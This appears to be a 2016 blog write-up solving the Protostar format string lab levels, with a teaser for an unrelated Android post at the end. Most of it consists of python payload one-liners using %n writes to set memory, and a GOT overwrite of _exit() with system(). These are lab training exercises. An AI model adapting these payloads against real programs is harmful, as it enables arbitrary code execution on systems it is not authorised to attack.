Wednesday, December 21, 2016

Exploit Exercises - Format String

Format1:
Padding to last mem dump
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Write
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
DMA
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
Format2 need write value to address:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
|Address|Value|Padding|%n

DMA
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 byte with speacify address:
POC:
python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x"*3+"%482x%n"'

Format 4: We need overwrite GOT table.
--> Overwrite _exit() address with system() address

python -c 'print "\x24\x97\x04\x08"+"\x25\x97\x04\x08"+"\x26\x97\x04\x08"+"\x27\x97\x04\x08"+"%164x%4$n%208x%5$n%128x%6$n%260x%7$n"' > pro4_dma

Nice trick to caculate address 
user@protostar:/opt/protostar/bin$ gdb -q
(gdb) p 0xb4 - 0x00000010
$1 = 164
(gdb) p 0x84 - 0xb4
$2 = -48
(gdb) p 0x184 - 0xb4
$3 = 208
(gdb) p 0x04 - 0x84
$4 = -128
(gdb) p 0x104 - 0x84
$5 = 128
(gdb) p 0x08 - 0x04
$6 = 4
(gdb) p 0x108 - 0x04
$7 = 260

Get value of this address to overwrite and sub. 

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.


Install Xposed Inspector and Frida on Genymotion

Today i had some work with android. So i need trace application. I found 2 nice tool can help me: Xposed Inspector and Frida. To setup ther...